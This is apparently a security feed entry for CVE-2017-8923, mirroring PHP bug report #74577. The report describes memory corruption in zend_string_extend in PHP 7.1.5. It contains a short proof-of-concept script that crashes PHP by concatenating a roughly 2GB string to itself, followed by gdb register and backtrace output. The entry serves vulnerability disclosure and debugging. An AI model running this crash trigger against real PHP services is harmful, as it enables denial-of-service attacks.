Headline

CVE-2017-8923: PHP :: Bug #74577 :: Memory corruption in zend_string_extend

The zend_string_extend function in Zend/zend_string.h in PHP through 7.1.5 does not prevent changes to string objects that result in a negative length, which allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact by leveraging a script’s use of .= with a long string.

7 years ago

CVE

Open in Source

#dos #git #php #sap

Bug #74577

Memory corruption in zend_string_extend

Submitted:

2017-05-12 06:33 UTC

Modified:

2017-05-12 06:46 UTC

From:

whitehat002 at hotmail dot com

Assigned:

Status:

Duplicate

Package:

Reproducible crash

PHP Version:

7.1.5

OS:

Private report:

CVE-ID:

None

[2017-05-12 06:33 UTC] whitehat002 at hotmail dot com

Description:

This bug only exists in php7.This can result in denial of service or other problem.

Test script:

<?php ini_set('memory_limit’,-1); $a=str_repeat("a",0x7ffffe00); $a.=$a;

Expected result:

no crash

Actual result:

[----------------------------------registers-----------------------------------] EAX: 0xfffffc00 EBX: 0xb7013050 --> 0x36c00000 ECX: 0x80000000 EDX: 0x36c00010 ESI: 0xb7013050 --> 0x36c00000 EDI: 0x36c00000 EBP: 0x7ffffe00 ESP: 0xbfffc080 --> 0x0 EIP: 0x83b7b09 (<concat_function+393>: mov DWORD PTR [edi+0x8],0x0) EFLAGS: 0x210286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x83b7b00 <concat_function+384>: mov edi,eax 0x83b7b02 <concat_function+386>: mov eax,DWORD PTR [esp+0x18] 0x83b7b06 <concat_function+390>: lea edx,[edi+0x10] => 0x83b7b09 <concat_function+393>: mov DWORD PTR [edi+0x8],0x0 0x83b7b10 <concat_function+400>: mov DWORD PTR [esp+0x2c],edx 0x83b7b14 <concat_function+404>: mov DWORD PTR [edi+0xc],eax 0x83b7b17 <concat_function+407>: jmp 0x83b7a56 <concat_function+214> 0x83b7b1c <concat_function+412>: mov ecx,DWORD PTR [esp+0x20] [------------------------------------stack-------------------------------------] 0000| 0xbfffc080 --> 0x0 0004| 0xbfffc084 --> 0x5 0008| 0xbfffc088 --> 0xbfffc1a8 --> 0x1 0012| 0xbfffc08c --> 0xbfffc110 --> 0xb70543f0 --> 0xb70543d8 --> 0xb70543a8 --> 0xb7054420 (–> …) 0016| 0xbfffc090 --> 0xb705e320 --> 0x0 0020| 0xbfffc094 --> 0x7ffffe00 0024| 0xbfffc098 --> 0xfffffc00 0028| 0xbfffc09c --> 0xb7013050 --> 0x36c00000 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV zend_string_extend (persistent=0x0, len=0xfffffc00, s=0x36c00000) at /root/php-7.1.5/Zend/zend_string.h:210 210 zend_string_forget_hash_val(ret); gdb-peda$ bt #0 zend_string_extend (persistent=0x0, len=0xfffffc00, s=0x36c00000) at /root/php-7.1.5/Zend/zend_string.h:210 #1 concat_function (result=0xb7013050, op1=0xb7013050, op2=0xb7013050) at /root/php-7.1.5/Zend/zend_operators.c:1759 #2 0x08439dba in zend_binary_assign_op_helper_SPEC_CV_CV ( binary_op=0x83b7980 <concat_function>, execute_data=0xb7013020) at /root/php-7.1.5/Zend/zend_vm_execute.h:44196 #3 0x0840969e in execute_ex (ex=0xb7013020) at /root/php-7.1.5/Zend/zend_vm_execute.h:432 #4 0x08457abf in zend_execute (op_array=0xb7069180, return_value=0x0) at /root/php-7.1.5/Zend/zend_vm_execute.h:474 #5 0x083c1890 in zend_execute_scripts (type=0x8, retval=0x0, file_count=0x3) at /root/php-7.1.5/Zend/zend.c:1476 #6 0x08362cad in php_execute_script (primary_file=0xbfffe464) at /root/php-7.1.5/main/main.c:2537 #7 0x08459bd4 in do_cli (argc=0x3, argv=0x8a8e868) at /root/php-7.1.5/sapi/cli/php_cli.c:993 #8 0x080785ad in main (argc=0x3, argv=0x8a8e868) at /root/php-7.1.5/sapi/cli/php_cli.c:1381 #9 0xb791daf3 in __libc_start_m

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports